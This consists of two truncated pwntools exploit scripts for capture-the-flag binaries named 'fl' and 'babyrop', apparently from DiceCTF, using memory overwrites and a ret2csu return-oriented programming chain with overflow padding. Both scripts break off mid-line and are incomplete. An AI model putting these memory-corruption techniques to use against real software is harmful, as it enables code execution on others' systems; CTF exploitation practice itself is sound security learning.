# exploit.py from pwn import * #context.log_level = 'debug' p = process("./fl") lib = ELF("./libc-2.27.so") #p = remote("dicec.tf", 31904) def Mal(idx, data): p.sendlineafter(":", b'1') p.sendlineafter(":", str(idx)) p.sendlineafter(":", data) def Flip(): p.sendlineafter(":", b'2') p.sendlineafter(":", b'3') Mal(1, p64(0x404020)) Flip() payload = p64(0x404040) payload += p64(0x404120)*3 payload ..

# exploit.py from pwn import * #context.log_level = 'debug' p = process("./babyrop") #p = remote("dicec.tf", 31924) e = ELF("./babyrop") setcsu = 0x4011ca csu = 0x4011b0 def chaining(func, p1, p2, p3): ret = p64(0) ret += p64(1) ret += p64(p1) ret += p64(p2) ret += p64(p3) ret += p64(func) ret += p64(csu) ret += p64(0) return ret payload = b'A'*0x48 payload += p64(setcsu) payload += chaining(e.g..